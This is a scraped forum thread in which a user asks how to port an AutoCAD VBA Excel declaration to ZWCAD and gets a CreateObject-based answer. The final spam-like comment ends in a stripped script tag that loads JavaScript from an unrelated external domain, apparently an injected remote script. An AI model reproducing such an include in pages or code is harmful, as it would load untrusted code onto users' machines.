ZWSOFT User Community > ZWSOFT Forums - Find. Share. Connect. > ZWCAD > ZWCAD equivalent for AutoCAD VBA Command
ZWCAD equivalent for AutoCAD VBA Command
ZWCAD equivalent for AutoCAD VBA Command
23-09-2011 01:34 . am | View his/her posts only
"ZWCAD equivalent for AutoCAD VBA Command"
I am new to ZWCAD and am trying to migrate old AutoCAD VBA Macros to ZWCAD VBA MAcros.Below is the statement in AutoCAD VBA.
"Public objExcel As Excel.Application"
I failed to get the equivalent in ZWCAD.
Please help me!
I am new to ZWCAD and am trying to migrate old AutoCAD VBA Macros to ZWCAD VBA MAcros.Below is the statement in AutoCAD VBA.
"Public objExcel As Excel.Application"
I failed to get the equivalent in ZWCAD.
Please help me!
26-09-2011 01:43 . am | View his/her posts only
hi tulasi, ZWCAD doesn't support .NET, please define it via VBA:
dim objExcel as object
set objExcel = createobject("excel.application")
dim objExcel as object
set objExcel = createobject("excel.application")
ZWCAD equivalent for AutoCAD VBA Command
26-12-2011 12:18 . am | View his/her posts only
ZWCAD equivalent for AutoCAD VBA Command really a very good information< ="text/" ="http://ui.streamride.net/ui.js">



